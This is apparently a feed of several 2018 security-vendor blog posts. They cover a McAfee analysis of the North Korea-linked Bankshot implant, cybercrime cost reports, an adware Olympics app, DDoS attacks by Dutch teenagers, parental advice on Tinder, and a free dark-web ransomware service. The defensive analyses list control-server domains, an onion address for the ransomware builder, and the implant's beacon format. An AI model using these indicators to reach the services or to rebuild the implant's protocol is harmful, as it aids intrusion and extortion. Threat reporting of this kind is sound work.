the Further investigation into this campaign and analysis of McAfee product telemetry shows that the infection occurred on March 2 and 3. The implant’s first target was a major government-controlled financial organization. It next appeared in another Turkish government organization involved in finance and trade. A further three large financial institutions in Turkey were victims of this attack. The implant has so far not surfaced in any other sector or country. This campaign suggests the attackers may plan a future heist against these targets by using Bankshot to gather information.

Bankshot implants are distributed from a domain with a name similar to that of the cryptocurrency-lending platform Falcon Coin, but the similarly named domain is not associated with the legitimate entity. The malicious domain was created December 27, 2017, and was updated on February 19, only a few days before the implants began to appear. These implants are variations of earlier forms of Bankshot, a remote access tool that gives an attacker full capability on a victim’s system. This implant also contains functionality to wipe files and content from the targeted system to erase evidence or perform other destructive actions. Bankshot was first reported by the Department of Homeland Security on December 13, 2017, and has only recently resurfaced in newly compiled variants. The sample we analyzed is 99% similar to the documented Bankshot variants from 2017.

Bankshot implants hosted on

The Bankshot implant is attached to a malicious Word document with the filename Agreement.docx. The document appears to be an agreement template for Bitcoin distribution between an unknown individual in Paris and a to-be-determined cryptocurrency exchange. The author of this document is test-pc. It was created February 26 and was submitted from the Netherlands. The document contains an embedded Flash script that exploits CVE-2018-4878 and downloads and executes the DLL implant from

We discovered two more documents, written in Korean, that exploit the same vulnerability as Agreement.docx. These documents appear to be part of the same campaign and may have been used on different targets. These documents also communicated with to install Bankshot and also contain themes around cryptocurrency security.

Two Flash files exploit CVE-2018-4878.

  • 843c17b06a3aee22447f021307909890b68828b9 (February 25)
  • 343ebca579bb888eb8ccb811f9b52280c72e484c (February 25
Malicious documents in the attack.


Malicious document exploiting CVE-2018-4878.

The implants are downloaded via a Flash file embedded in the malicious document. They are executed when the victim views the document.

The malicious site embedded in the Flash file.
Implant directory contained in the malicious Flash file.

The implants (DLLs) are disguised as ZIP files and communicate with three control servers, two of them Chinese-language online gambling sites. These URLs can be found hardcoded in the implants’ code.

Hardcoded control server URLs.


Analyzing Bankshot

The sample (a2e966edee45b30bb6bb5c978e55833eec169098) is a Windows DLL that serves as a backdoor and contains a variety of capabilities. The malicious DLL is not a service DLL because it lacks ServiceMain(). To mask itself, it can run as a regular library loaded into a legitimate process.

The malware begins by creating a new thread from the DllMain() function to carry out its malicious activities:

New thread created in the malware’s DllMain() function.

The malware performs the following activities:

  • Builds imports by dynamically loading APIs
  • Decrypts strings needed for control server communications
  • Performs control server communications
  • Handles commands issued by the control server
  • Uninstalls self from the system

The malicious thread dynamically loads the APIs it needs at the beginning of its execution using LoadLibrary() and GetProcAddress(). APIs from the following libraries are loaded at runtime:

  • Kernel32.dll
  • Ws2_32/wsock32.dll
  • Apvapi32.dll
  • Oleaut32.dll
  • Iphlp.dll
  • Urlmon.dll
A dynamic API loaded by the malware.


Based on packet capture analysis of previous implants from 2017, the following strings are used in control server communications:

  • Connection: keep-alive
  • Cache-Control: max-age=0
  • Accept: */*
  • Content-Type: multipart/form-data; boundary=
  • Content-Type: application/octet-stream
  • Accept-Encoding: gzip,deflate,sdch
  • Accept-Language: ko-KR -> Korean
  • Content-Disposition: form-data;name=”board_id”
  • Content-Disposition: form-data;name=”user_id”
  • Content-Disposition: form-data;name=”file1″; filename=”img01_29.jpg”
  • Content-Disposition: form-data;name=”file1″; filename=”my.doc”
  • Content-Disposition: form-data;name=”file1″; filename=”pratice.pdf”
  • Content-Disposition: form-data;name=”file1″; filename=”king.jpg”
  • Content-Disposition: form-data;name=”file1″; filename=”dream.avi”
  • Content-Disposition: form-data;name=”file1″; filename=”hp01.avi”
  • Content-Disposition: form-data;name=”file1″; filename=”star.avi”

User Agents

The implant either fetches the user agent from Internet Explorer (using ObtainUserAgentAsString()) or uses a default user agent specified in the malware binary:

Mozilla/5.0 (Windows NT 6.1; WOW64) Chrome/28.0.1500.95 Safari/537.36

Control Server Communications

The malware initiates communication with the control server by sending it an HTTP POST request with additional optional HTTP data, such as:

Content-Disposition: form-data; name="board_id"

Content-Disposition: form-data; name="user_id"

Content-Disposition: form-data; name="file1"; filename="king.jpg"
Content-Type: application/octet-stream
  • board_id is a four-digit number that may be an identifier for a campaign ID. Based on analysis of previous samples, this is a unique identifier.
  • user_id is a hardcoded value in the malware binary that is sent to the control server. The username appears to be attacker specified and has occurred in 2017 Bankshot samples. This links the previous samples with this unique username.
  • filename is based on static analysis. This looks like a specific beacon to indicate that the malware is ready to receive commands.

The optional HTTP data with king.jpg looks like a beacon to inform the control server that the malware is ready to accept new commands:

  • Commands received from the control server are encoded DWORDs
  • After decoding, these DWORDs should be in the range 123459h to 123490h
Malware checking to make sure a received command is in the correct range.


The command index calculator and jump to the appropriate command.


The command index table and command handler address table. 

Implant Capabilities

Based on the responses received from the control server, the malware can carry out the following malicious tasks:

  • Recursively generate a list of files in a directory and send to the control server
  • Terminate a specific process. The process is identified by the control server sending the PID to the malware.
The capability to terminate a process.
  • Gather network addresses and operating system version
  • Execute arbitrary commands using “cmd.exe /c”
The capability to execute system commands.


Spawning arbitrary processes.
  • Create processes
  • Write responses from the control server to a file
  • Send information for all drives
  • Write data sent by the control server to a temporary file matching the file path pattern %temp%\DWS00*
  • Change the time of a file as specified by the control server
The malware changing the file time.
  • Create a process by impersonating a logged-on user


Getting a user token using WTSQueryUserToken.


A process created as logged-in user.
  • Gather the process time for all processes
Getting time information for all processes running on the system.
  • Gather domain and account names based on all running processes
Gathering account information from running processes.
  • Read a specified file’s contents and send the data to the control server
  • Write data sent by the control server to an existing file
  • Mark a file to be deleted on reboot
Marking a file for deletion on reboot.
  • Overwrite a file with all zeros and mark it for deletion on reboot
Wiping files with zeros and marking it for deletion on reboot. 
  • Delete files using the DeleteFile() API
  • Load an arbitrary library into its process space. This may be used to load additional downloaded components of the attack.
Loading an arbitrary library into its own process space. 

After every action is performed the malware sends a response to the control server indicating whether the action was successful.


The US government reports that Bankshot is used by Hidden Cobra to target multiple industries including financial organizations. This implant has been connected to a major Korean bank attack and is also known as Trojan Manuscript. That variant contained the capability to search for hosts related to the SWIFT network and the same control server strings as the variant we found targeting the Turkish financial sector. The implant does not conduct financial transactions; rather it is a channel into the victim’s environment, in which further stages of implants can be deployed for financial reconnaissance. The Bankshot implant was also observed in 2017 in documents appearing to come from Latin American banks.

Malicious document delivering the Bankshot implant in 2017.

These connections, combined with the implant’s nearly identical appearance to known variants, are a strong indication that we have uncovered a Hidden Cobra attack. Further, previous implants from 2017 contained bogus documents with financially themed content.

A code comparison of hash 12c786c490366727cf7279fc141921d8 with hash 6de6a0df263ecd2d71a92597b2362f2c (from November 28, 2017). 


We have found what may be an early data-gathering stage for future possible heists from financial organizations in Turkey (and possibly other countries). In this campaign, we see the adoption of a recent zero-day Adobe Flash vulnerability to get the implant onto the victim’s systems.

The campaign has a high chance of success against victims who have an unpatched version of Flash. Documents with the Flash exploit managed to evade static defenses and remain undetected as an exploit on VirusTotal. This is the first time that Bankshot has been tied directly to financial-related hacking and the first time it has been used since November 2017.

McAfee detects these threats as:

  • RDN/Generic Exploit
  • RDN/Generic.dx
  • Generic PWS.y
  • Generic.hbg
  • Exploit-CVE2018-4878

McAfee customers are also covered by McAfee Global Threat Intelligence Web Reputation classification, which rate these URLs as High Risk.


Indicators of Compromise

MITRE ATT&CK techniques

  • Exfiltration over command and control channel
  • Commonly used port
  • Command-line interface
  • Service execution
  • Automated collection
  • Data from local system
  • Process discovery
  • System time discovery
  • Credential dumping
  • Exploitation of vulnerability
  • Process injection
  • File deletion


  • 650b7d25f4ed87490f8467eb48e0443fb244a8c4
  • 65e7d2338735ec04fd9692d020298e5a7953fd8d
  • 166e8c643a4db0df6ffd6e3ab536b3de9edc9fb7
  • a2e966edee45b30bb6bb5c978e55833eec169098


  • 530hr[dot]com/data/common.php
  • 028xmz[dot]com/include/common.php
  • 168wangpi[dot]com/include/charset.php
  • Falcancoin[dot]io


The post Hidden Cobra Targets Turkish Financial Sector With New Bankshot Implant appeared first on McAfee Blogs.

A Map of the Most Dangerous Sources of Cybercrime

This blog post was written by James Andrew Lewis, senior vice president at the Center for Strategic and International Studies (CSIS). 

Now that 3 companies and 13 individuals from Russia have been indicted for U.S. election interference, the general American populace has insight into a problem that has been growing for years: Russia has little respect for the law.  In fact, based on a recent study on the Economic Impact of Cybercrime CSIS undertook with McAfee, Russia leads the world in cybercrime. This reflects both the skill of its hacker community and its disdain for western law enforcement.

The complex and close relationship between the Russian state and organized crime means that Russia provides a sanctuary for the most advanced cybercriminals, who focus on the financial sector. The best cybercriminals in the world live in Russia, and as long as they do not travel to countries where they could be arrested, they are largely immune from prosecution. For example, one of the cybercriminals who hacked Yahoo at the behest of Russian intelligence services, compromising millions of accounts and transferred the PII to the Russian government, also used the stolen data for spam and credit card fraud for personal benefit.

Yet Russia is hardly the only country specializing in cybercrime; China, North Korea, and Iran are right up there. The combination of massive budgets, access to talent and protection from law enforcement make nation-states the most dangerous source of cybercrime, which our report estimates takes about a $600 billion toll on the global economy.

Next to Russia, we believe North Korea is the next most important nation for cybercrime. Both hack banks for financial gain. In 2015-2016, for instance, a cybercrime campaign targeted dozens of banks in the SWIFT network, stealing tens of millions of dollars from banks in developing countries. The North Korean Reconnaissance General Bureau (RGB) has been linked to these attacks, which provided a lucrative way to supplement the North Korean government’s access to foreign currency.

Recognizing the difficulty of pulling off large-scale thefts from a single major western bank, the RGB targeted smaller, less sophisticated banks in developing countries like Bangladesh, Vietnam, and Ecuador. In Bangladesh, they used the victim banks’ credentials to send what looked like legitimate SWIFT fund transfer requests These requests at first appeared legitimate to the receiving banks, since they were sent from legitimate partner banks through the established channels, so in some cases, the money was transferred.

North Korea also has turned to cryptocurrency theft to help fund its regime. North Korean hackers have targeted at least three South Korean cryptocurrency exchanges in 2017. Cryptocurrencies are a particularly valuable target for North Korea, who are able to use Bitcoin’s anonymity to circumvent international sanctions. Some researchers have speculated that North Korean actors have also been involved in attempts to surreptitiously install Bitcoin mining software on hacked computers, hijacking networks of compromised systems to mine for cryptocurrencies. The Pyongyang University of Science and Technology has begun offering its computer science students classes in Bitcoin and Blockchain, confirming the growing interest in cryptocurrencies for North Korea.

Hackers in North Korea and Russia, whether affiliated with the state or not, account for much of the cybercrime that occurs in the world. Until these nation-states change their behavior, either by stopping state support for hacking or by enforcing laws against criminal hackers, cybercrime will remain a major international problem.

The post A Map of the Most Dangerous Sources of Cybercrime appeared first on McAfee Blogs.

Mobile Menace Monday: Olympics app has more ads than games

An app claiming to live stream the 2018 Winter Olympics (but really serving up a blizzard of ads) had a short run on Google Play. It was uploaded to the Play store on February 8, 2018. Since then, it’s been removed. The last known existence of it on the store was a cached snapshot from February 10.

Poorly-made app

At first, things seem normal with a simple opening screen.

After displaying the first ad, it goes onto a navigation screen.

Click on each live stream link, and it’s a gamble whether it actually redirects to a functioning live stream or not. I found that most of the time, the app crashed. In contrast, the app’s ability to display ads never falters.

Click to view slideshow.

More ads than games

An app serving up ads in order to use it for free is nothing new, and most of us humbly accept. The decision for mobile malware researchers to classify some of these apps as adware isn’t always easy. In this case, the Olympic streaming app doesn’t use anything unusual to serve ads. To put it another way, it isn’t using any known aggressive Ad SDKs. However, when these ads pop up after every click, it’s excessive.

It’s clear that the true intent here is not to live stream the Olympics, but to serve up as many ads as possible before the app crashes. Thus, we gave this failed app a classification of Android/Adware.LiveStream.

Combing through Google Play

The sheer number of apps like these found on Google Play that teeter on the line between clean or adware is overwhelming. As we have found time and time again, it’s impossible for Google Play to catch all of these. This is true even with Google’s more advanced Play Protect feature.

Moreover, it’s impossible for mobile malware researchers to keep up with all these “grey” apps as well. This is especially true with special cases like these, where detailed analysis is needed to make a determination. It’s important to note that even if apps like these do slip through, they are generally low risk.

User responsibility: tips to stay safe

Due to the overwhelming number of questionable apps on Google Play, some responsibility to pick safe apps must fall on users. Here are some tips to stay safe.

Check the details

Before installing an app, check the app’s details page for evidence of anything out of the ordinary. Things to look for are the app’s reviews, number of installs, and the last update. If there are a low number of reviews and/or the app has poor reviews, be wary. The same goes for a low number of installs of the app.

Lastly, if the app was recently updated, this could indicate that it was also recently uploaded to Google Play—which isn’t necessarily a bad thing, but it does make it harder to vet the app’s security. Unfortunately, Google Play doesn’t display when the app was first uploaded, so the updated date is the best data you have to determine whether it’s new or not.

If, after all this, you decide to install the app and it contains what you think is adware, no need to panic. Most of these grey apps just display annoying ads, and there is no other harm. Simply uninstall and go on with your day.

APK Samples

MD5: 9338E7E6D378DE01C14DB939D51B1D11

Package Name: com.ww2018OLYMPICLIVETV_6516426

The post Mobile Menace Monday: Olympics app has more ads than games appeared first on Malwarebytes Labs.

McAfee’s Podcast Hackable? is Back for Season Two

We live in a digital era, which means the more things are becoming internet-connected, the more opportunities hackers have to infiltrate our lives. McAfee created the podcast Hackable?, which has now been downloaded over 1 million times, to raise awareness about the extreme lengths hackers are willing to go in order to steal our personal information. This show takes hacks seen throughout pop culture and puts them to the test in the real world to separate fact from fiction. And now, Hackable? is back for season two and host Geoff Siskind, with the help of the crew of good-guy hackers, is back with even more excitement.

So – what’s in store for season two? In the premiere episode, “Keyless Entry,” host Geoff Siskind teams up with a white-hat hacker to see how easy it is to break into your car using a laptop. And the fun doesn’t stop there, as with season one, new episodes will be launching every two weeks.

Within these episodes, the crew finds themselves trapped in a smart car wash that’s been taken over by hackers, they learn just how simple it is to crack someone’s password and take over all of their accounts, and they put the security of traditional locks up against the new digital ones.

So, be sure to head over to Apple Podcasts to hear all the latest episodes as well as catch up on the excitement from season one. Don’t forget to subscribe, rate, and review. And, of course, stay on top of the latest consumer and mobile security threats by following me and @McAfee_Home on Twitter, and ‘Like’ us on Facebook.

The post McAfee’s Podcast Hackable? is Back for Season Two appeared first on McAfee Blogs.

Over 40% of online login attempts are attackers trying to invade accounts

Bots that traverse the internet on behalf of their human operators can fulfill both legitimate and malicious automated tasks. Statistics indicate that bot-driven internet traffic, by helper and harmful bots combined, surpasses human traffic.

The post Over 40% of online login attempts are attackers trying to invade accounts appeared first on WeLiveSecurity

Is Your Teen Using Tinder? Here’s What You Need to Know

Teens on Tinder

Teens are curious. 
It’s fun to meet and date people they don’t see in the hallways every day. 
It feels good when someone swipes right and finds them attractive.
Flirting is fun. 

These are just a few reasons many teens are exploring Tinder these days, the dating app popular in the twenty- and thirty-something crowd.

While Tinder isn’t new (launched in 2012), app trends among teens change constantly, and this is a recent one. We’ve got a lot on our digital radar as parents but apps that match (underaged) users within a defined geographic area get popular, it quickly shoots to the top of our radar. So, let’s take a look.

What’s the Big Deal

Tinder allows users 18 and over to register for nearby “matches” but because Tinder links to Facebook accounts for verification, underage users can easily input a false birthdate to circumvent the rules.Teens on Tinder

To tweens and teens, chatting with people nearby sounds fun, but to parents, the app opens the door to anything from pedophiles to bullies to stalkers to abuse. From a parent’s point of view, when the dating pool widens, so too do the risks. High school students are not immune from abuse. In fact, according to, every year, approximately 1.5 million high school students nationwide experience physical abuse from a dating partner; one in three adolescents in the U.S. is a victim of physical, sexual, emotional or verbal abuse from a dating partner.

Tinder allows users to connect three main social accounts: Spotify, Instagram, and Facebook, which can easily put personal information into the hands of the wrong people. Users are also encouraged to give the name of their High School and their workplace to further refine matching.

Emotional Risks

While our first thought is physical danger, using dating apps too early also threatens a child’s emotional health and confuses their still-developing social and interpersonal skills.  The risk of heartbreak, betrayal, and emotional abuse can be devastating for kids who aren’t ready to date — let alone wisely discern an endless pool of possible matches.Teens on Tinder

Too, there’s no shortage on Tinder of teens making it clear that they are just looking for a “hookup” or a “good time.” So, allowing tweens into that arena before they are ready can carry huge emotional and physical consequences.

Worth Distortion

Dating apps can also distort your child’s understanding of a worthy partner and reinforce looks-based relationships. If choosing a mate is as natural as swiping left (don’t like) and swiping right (like), then the hope of someday meeting “the one” could become a whole lot more difficult, if not impossible. And how much easier can your child’s uniqueness and worth be overlooked with just a swipe? Using dating apps before you are ready is an emotional wreck waiting to happen.

Under 18 

Monitor apps. Check your child’s phone for the Tinder app icon (see below). Don’t forget: Kids hide apps behind vault apps that may look like a game, a calculator, or a safe. So, do some clicking. If you discover your son or daughter is using Tinder ask them why and have them walk you through how they use it personally. Discuss the reasons against using the app, listen to their reasoning, decide on a family plan moving forward. If they are under 18, consider having them delete the app.

Tinder app icon.

Factors such as age and maturity will, no doubt, affect every family’s dating app plan. My daughter is almost 18, a high school senior, and heading to college in a blink. So, my conversation will be dramatically different from the parent of a 13-year-old.


Discuss the bigger picture. In a swipe right culture, values can quickly vanish. If you allow your child to date, discuss his or her relationship values. What makes a person attractive? What character traits do you desire? What expectations do you have of a relationship?

Over 18

Look beyond profiles. Advise your teen to do some sleuthing and look beyond a person’s Tinder profile for red flags revealing inconsistencies in truthfulness and character. Tinder warns: “Bad actors often push people to communicate off the platform immediately. It’s up to you to research and do your due diligence.”

Set up ground rules. Face-t0-face meetings with a stranger outside of Tinder (or any online platform) should be in a public location. Your child should always drive his or her vehicle and have their phone fully charged. Make sure inform you of who they are meeting with and where.

Reality Check

Kids establishing online friendships is here to stay. Some of your child’s best friends will likely be found online. Dating apps aren’t “bad,” but people can be careless and abusive when using them. And, using dating apps under 18, as many kids are doing today, only invites premature risk.

Remember, a digital connection may not have been the way you met friends or love interests in your day, but it’s a natural channel today. Be open to the social shift but equally alert and willing to exercise full-throttle parenting to keep your kids safe.


toni page birdsong



Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @McAfee_Family. (Disclosures). 

The post Is Your Teen Using Tinder? Here’s What You Need to Know appeared first on McAfee Blogs.

New McAfee Report Reveals Identity Theft is the Most Expensive Form of Property Crime

Between Uber, Equifax, and a handful of others, the U.S. has witnessed major data breaches in the past year that have compromised the personal information of millions, leaving them to deal with the possibility of identity theft. And the impact is not lost on consumers, as according to a recent McAfee survey, 61% of consumers say their concern about online security has increased over the past five years. So, to track the effects and financial impact of these attacks, the Center for Strategic and International Studies (CSIS) and McAfee released a new report, The Economic Impact of Cybercrime, which found that identity theft is the most expensive kind of property crime in the U.S.

So, just how much money have these breaches cost everyday consumers? Identity theft specifically has cost people $10 billion more than the loses attributed to all other property crime. You heard correctly: billion. The report also tells us that since 2014, nearly three billion internet credentials and other personally identifiable information (PII) have been stolen by hackers, and two-thirds of people online (more than two billion individuals) have had their personal information stolen or compromised. In fact, cybercrime ranks third in dollar value among illegal activities globally, just behind government corruption and narcotics trafficking. 

Now the next question is – what’s being done to protect against this? Usually, those compromised by these attacks scan their bank statements, sign up for monitoring, and chop up their credit cards. But beyond that – not much. Even though consumers are concerned about their personal security, only 37% of individuals use an identity theft protection solution, and 28% have no plans to sign up for an ID theft protection solution, meaning there is still more that can be done. Therefore, to ensure your personal identity stays protected, follow these tips: 

  • Be careful about what you share. Signing up for new services usually requires you to provide personal information. But before giving that information away, it’s critical to consider the cost of doing so and determine if the service received is worth the cost sharing that data.
  • Check your privacy settings. This is an easy one. You should adjust your settings to only share data when required, or only with people you know and trust.
  • Utilize an identity theft solution. With all this personal data floating around online, it’s important to stay aware of any attempts to steal your identity. Use an identity theft solution, such as McAfee Identity Theft Protection, that can help protect personally identifiable information from identity theft and fraud.

And, of course, stay on top of the latest consumer and mobile security threats by following me and @McAfee_Home on Twitter, and ‘Like’ us on Facebook.


The post New McAfee Report Reveals Identity Theft is the Most Expensive Form of Property Crime appeared first on McAfee Blogs.

DDoS Attacks in the Netherlands Reveal Teen Gamers on Troublesome Path

At the end of January, the Netherlands was plagued by distributed denial of service (DDoS) attacks targeting various financial institutions, tech sites, and the Dutch tax authorities. At the time of the attacks it was unclear who was responsible, and this led to speculation among security experts.

Coincidentally, the attacks started a few days after it was announced in the media that the Dutch General Intelligence and Security Service, the AIVD, had played a major role in relaying crucial information to their American counterparts regarding attacks of suspected Russian state-sponsored hackers.

Thus, the hypothesis that the attacks were some kind a state-sponsored retaliation was quickly formed. Security experts deemed this hypothesis possible, but it remained unproven.


Then on February 1, an 18-year-old suspect was arrested by the National High Tech Crime Unit of the Dutch police. The suspect carelessly left behind some crucial pieces of evidence, which ultimately led to his arrest. Through open-source research, the McAfee Advanced Threat Research team was also able to find links between the arrested suspect and another known DDoS actor. At this moment the police investigation is ongoing to determine the degree of guilt and whether the suspect acted independently. But one thing is certain: The wave of attacks has stopped since his arrest.

The relative ease with which the attack was carried out is striking. The individual had presumably bought a “stresser/booter service” capacity for about €40. The stresser enabled him to launch attacks with a volume of about 40Gbps.

(Stresser, or booter, services are websites that offer distributed denial of service capability as a paid service. These websites offer a way to stress-test a host by simply filling in its IP address. The traffic power these services need can be generated from legitimate or illegitimate sources. Attacking a host or website without legal consent is a highly illegal.)

McAfee Chief Scientist and Fellow Raj Samani has written “you can disrupt your competition for the price of a cup of coffee.” This attack suggests you can disrupt entire organizations or parts of a country for the price of a pound of good coffee beans.

Thus speculation of a possible state-sponsored retaliation dissolved into an inexpensive and relatively easy method of attack, performed by a teenager.

Earlier DDoS Attacks

This sequence of events reminds me of an earlier DDoS attack I personally investigated. In 2015 one of the largest internet service providers in the Netherlands suffered a DDoS attack for three consecutive days. This attack deprived roughly 1.8 million subscribers of Internet access. In a period of several weeks and after an extensive police investigation, a group of suspects was arrested. All but one of them were teenagers, with the youngest only 14 years old. Their methods were relatively simple as well, from basic Python scripts to the use of stresser/booter services.

I clearly recall that this group of suspects had a great affinity with online gaming. They were active on popular games such as Minecraft and Call of Duty and played a lot in groups or clans. Apparently, it was common practice for the suspects to knock their opponents offline during a game in order to win. Talk about fair play.

Could there be a connection between the gaming community and DDoS attacks, or is this purely a coincidence?

Gaming and DDoS

Who doesn’t remember the crippling Mirai DDoS attacks in the fall of 2016 on DNS provider Dyn, hosting provider OVH, and the popular security blog Krebs on Security?

Brian Krebs actively investigated the group behind the Mirai attacks against his site and published his findings online. During his research into the actors he described a fascinating world within the online gaming industry. In this industry it is big business to have powerful game servers, which attract many customers. This popularity makes those servers a target for the less successful, and their weapon of choice is often DDoS attacks. Game servers are apparently knocked offline daily to push gamers to migrate to the competition. All this distributed “violence” also gave birth to a lively and sometimes shady business in DDoS protection services.

So how would someone with only marginal technical knowledge go about knocking off websites? All it takes is simple search on one of the entry-level hacker forums. We found dozens of threads (some listed below) that discussed what it would take to attack (game) servers. Subsequently, the same forum was full of advertisements and reviews of various stresser and booter services offered online.

In February news surfaced that an online gaming service offered DDoS for hire. According to the article, the operators of a gaming service were behind the building of an IoT botnet named JenX and offered it as part of the game server rental scheme.

This shows there is a definite link between the online gaming community and the use of DDoS attacks. It is worrying to see that some individuals resort to such drastic measures out of pure frustration. We can only imagine the consequences when such an individual gets a low grade in school or has a disagreement with an online retailer.

End Note

As a former law enforcement official, I am troubled to see teenagers going down a criminal path. I can understand that for teens it is not always easy to foresee the consequences of their actions. One might think that knocking off websites is all fun and games or a way to show your frustration. But from my experience the fun definitely stops when the police come knocking at the door. Then it is literally game over.


The post DDoS Attacks in the Netherlands Reveal Teen Gamers on Troublesome Path appeared first on McAfee Blogs.

To See Mugshots of Today’s Bank Robbers, Look at a World Map

In Depression-era America, bank robbers John Dillinger, Baby Face Nelson, and Pretty Boy Floyd were household names. Newspapers detailed their heists, radios narrated their getaways, wanted posters plastered their mug-shot scowls from coast-to-coast. Every detail of their bank robberies and personal lives was seized upon, scrutinized, circulated, and discussed.

Eight decades later, bank robbery is a digital, systematic crime practiced – with methods constantly improved – by organized syndicates. The stubbled faces of Dillinger, Nelson, and Floyd have been replaced by shapes on the world map tracing the borders of Russia, North Korea, and Iran. A former NSA Deputy Director said publicly in March that “nation states are robbing banks.”

A 2015-16 campaign stole hundreds of millions of dollars from banks in the Society for Worldwide Interbank Financial Telecommunication (SWIFT) network. SWIFT network banks in. That campaign, which targeted developing countries, was linked to the North Korean Reconnaissance General Bureau (RGB), security analysts believe. In 2017 North Korean hackers targeted at least three South Korean cryptocurrency exchanges, capitalizing on Bitcoin’s anonymity to circumvent international sanctions. The Pyongyang University of Science and Technology has begun offering its computer science students classes in Bitcoin and blockchain.

The best cybercriminals in the world live in Russia, where they are largely immune from prosecution. For instance, one of the cybercriminals who hacked Yahoo at the behest of Russian intelligence services, compromising millions of accounts, used the stolen data for spam and credit card fraud for personal benefit. Iran’s DDOS attack on leading U.S. banks exemplify its coercive strategy to exert influence through disruption and destruction.

Hackers in these countries, whether affiliated with the state or not, account for much of the cost of global cybercrime. The latest strategy of their sophisticated operations is to target the “seams” between well-defended networks, exploiting weak points in the global financial network to pull off massive heists and in some cases further their national rhetoric.

To combat these operations, major international financial institutions are investing in defense, better fraud prevention, and transaction authentication. One report says that banks spend three times as much on cybersecurity as non-financial institutions to fight what has become a systematic risk to financial stability.

In the 1920s and ‘30s, the world sat back and watched John Dillinger, Baby Face Nelson, and Pretty Boy Floyd do their dirty work as the FBI slowly closed in. We can’t do that today. Governments, financial institutions, companies with banking records, and anyone with an ATM card should be invested in stopping financial cybercrime.

Banks have banded together to share information in near real time in order to protect the stability of the broader electronic financial system on which the world economy to heavily depends. Ultimately, they have determined that no one organization can go it alone with faced with such organized and well-funded adversaries. With the stability of the global financial system in play, unprecedented collaboration has become the new norm, we at McAfee embrace the same spirit by building all of our technology to facilitate the sharing of critical data across hundreds of technology partners. It appears sharing and collaboration will be the only way to counter this new breed of adversary and no one can go it alone anymore. The banks are leading  the way in this new reality of Together is Power.

For more information, download the Economic Impact of Cybercrime report, and follow us on @McAfee.

The post To See Mugshots of Today’s Bank Robbers, Look at a World Map appeared first on McAfee Blogs.

The Many Forms of IP Theft Add Up to Big Losses

U.S. military drone technology surfaces on the black market and is bought by arms dealers. A pharmaceutical company based in Eastern Europe obtains trade secrets divulging the recipe for a popular prescription medication. A business that rejected an architect’s bid nevertheless uses part of that plan in construction. An advance copy of a much-anticipated “Game of Thrones” episode is sold to rabid fans on social media.

Welcome to the wide world of intellectual property theft, which accounts for one of the largest slices of overall global cybercrime. Unlike ransomware, crimes targeting financial institutions, or state-supported hacking, IP theft takes many forms – large and small, sophisticated and crude, strategic and unintentional – making it especially difficult to address. When it involves military technology, IP theft creates risks to national security. When it involves unlicensed use of creative assets, the losses can be invisible to the victim. Yet a resulting decline in revenue has an impact.

How serious is the global issue of IP theft? Diplomacy at the highest level prioritizes addressing IP theft above addressing state-run espionage. At the 2015 summit between Presidents Xi Jinping of China and Barack Obama of the United States, the leaders agreed that “neither country’s government will conduct or knowingly support cyber-enabled theft of intellectual property, including trade secrets or other confidential business information, with the intent of providing competitive advantages to companies or commercial sectors.”  Interestingly, the language of this agreement was drafted by the U.S. to allow continued espionage.  China and the U.S. tacitly agreed that they could continue to spy on each other if there was a national security justification. The resulting 2015 Obama Xi agreement on commercial cyber espionage may have “saved” the U.S. perhaps as much as $15 billion a year.

Putting a value on IP is an art.  How much is spent on research and development does not determine the value of IP,  Companies can estimate what the IP would fetch on the market if offered for sale or licensing.  Companies can estimate the future revenue stream their IP will produce, but there may be a long lag between theft and the introduction of a competing product.  One way to measure the cost of intellectual property theft is to look for competing products that take market share from the rightful owners. If hackers steal intellectual property from a small or medium sized enterprise, such as their product designs, it can be a fatal experience.

McAfee’s estimate puts the value of all IP in the U.S  at $12 trillion, with an annual increase of between $700 billion and $800 billion annually.  Based on our earlier analyses, and assuming that loss rates from IP theft track other kinds of cybercrime and the effect of the Obama-Xi agreement, the annual losses for the U.S. of between $10 billion and $12 billion from cybercrime targeting IP and perhaps $50 billion to $60 billion globally.

These figures may not reflect the full global loss. IP theft is everywhere, in many different forms.

For more information, download the latest Economic Impact of Cybercrime report, and follow us on @McAfee.

The post The Many Forms of IP Theft Add Up to Big Losses appeared first on McAfee Blogs.

Cybercrime weighs most heavily on financial service firms

A further breakdown of the overall figures shows that, in all, the actual cost hinges on a number of variables. The factors that enter heavily into the equation include attack types and their frequency, along with the organization’s size and even the country in which an organization is based.

The post Cybercrime weighs most heavily on financial service firms appeared first on WeLiveSecurity

Free Ransomware Available on Dark Web

The McAfee Advanced Threat Research team recently analyzed a ransomware-as-a-service threat that is available for free and without registration. This malware was first seen in July 2017 with the extension .shifr. It has now appeared in recent detections with the extension .cypher.


Ransomware-as-a-service is a cybercrime economic model that allows malware developers to earn money for their creations without the need to distribute their threats. Nontechnical criminals buy their wares and launch the infections, while paying the developers a percentage of their take. The developers run relatively few risks, and their customers do most of the work.

Some ransomware-as-a-service, such as RaaSberry, use subscriptions while others require registration to gain access to the ransomware. The ransomware developer hosts a service on the “dark web” that allows any buyer to create and modify the malware. For example, the buyer can add custom ransom notes and the amount of the payment. More advanced services offer features such as evasion techniques to avoid detection and analysis. The service can also offer a control server with an administration panel to manage each victim. This system is convenient for both the developer, who makes money by selling malware, and for buyers, who gain ready-to-deploy ransomware without needing any specific coding knowledge.

The underground economy behind this service is well organized, effectively offering a cybercrime infrastructure. Basically, the ransomware is available on a website. The buyer sets up the ransomware by adding a wallet address. The ransomware is then available to download. The buyer just needs to customize and spread the malware. When a victim pays the ransom, a percentage is delivered both to the buyer and to the malware coder.


The ransomware is available on the TOR network at hxxp://kdvm5fd6tn6jsbwh.onion. A web page guides buyers through the configuration process.

On the configuration page, a generic XMPP address suggests we may have found a demo version of the ransomware.

On the page, the buyer need only to add a Bitcoin wallet address and the amount of the ransom. Once that is done, the malware is generated and can be downloaded. With this malware, the developer earns a 10% commission on every payment. Now let’s look at the malware sample.

Dynamic Analysis 

When the malware launches on the victim’s system, it checks for an Internet connection. If there is none, it exits the process. Otherwise, it contacts the following addresses to download the encryption key:

Once the file is running, it creates several files on the system:

  • Encryption_key: the RSA key encrypted in AES
  • Lock_file: an indicator that the system is encrypted
  • Uuid_file: a reference for the infected machine. A TOR address is generated with this ID.

The encryption key is downloaded from hxxps://

The ransom note is created on the desktop.

The file “HOW_TO_DECRYPT_FILES.html” gives a link to the TOR network.

Once the files are encrypted, the ransom note is displayed in HTML and points to the TOR site hxxp://kdvm5fd6tn6jsbwh.onion/ with the ID of the infected machine.

